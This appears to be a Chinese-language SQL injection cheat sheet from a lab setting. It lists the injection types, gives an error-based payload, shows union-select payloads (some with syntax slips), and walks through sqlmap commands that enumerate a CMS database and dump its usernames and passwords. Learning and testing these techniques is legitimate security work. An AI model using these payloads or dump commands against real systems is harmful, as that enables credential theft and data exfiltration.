攻击者利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理员后台的密码),从而脱取数据库中的内容(俗称脱库)。
联合注入
报错注入
在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以进行报错注入。
报错注入的原理,就是在错误信息中执行SQL语句。出发报错的方式有很多,具体细节也不尽相同。建议直接背公式即可,以下为group by重复建冲突公式。
group by重复建冲突
?id=33 and (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2)x from information_schema.tables group by x)a)
布尔盲注
延时注入
堆叠查询(多语句查询)
是否有回显? 联合查询
是否有报错? 报错注入
是否有布尔类型状态? 布尔盲注
绝招 延时注入
参数描述:
-u:检测注入点
--dbs:列出所有数据库的名字
--current-db:列出当前数据库的名字
-D:指定一个数据库名字
--tables:列出表名,结合-D使用
-T:指定表名称
--columns:列出所有的字段名,结合-T,-D使用
-C:指定字段
--dump:列出字段内容
示例:
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33"
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" --dbs
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" --tables
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" --columns
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username, password" --dump
单引号
?id=1
?id=1' and 1=2 union select 1, version(), 3 --+
?id=-2 union select 1,2 database()
')
?id=2') and 1=2 union select 1,2 version() --+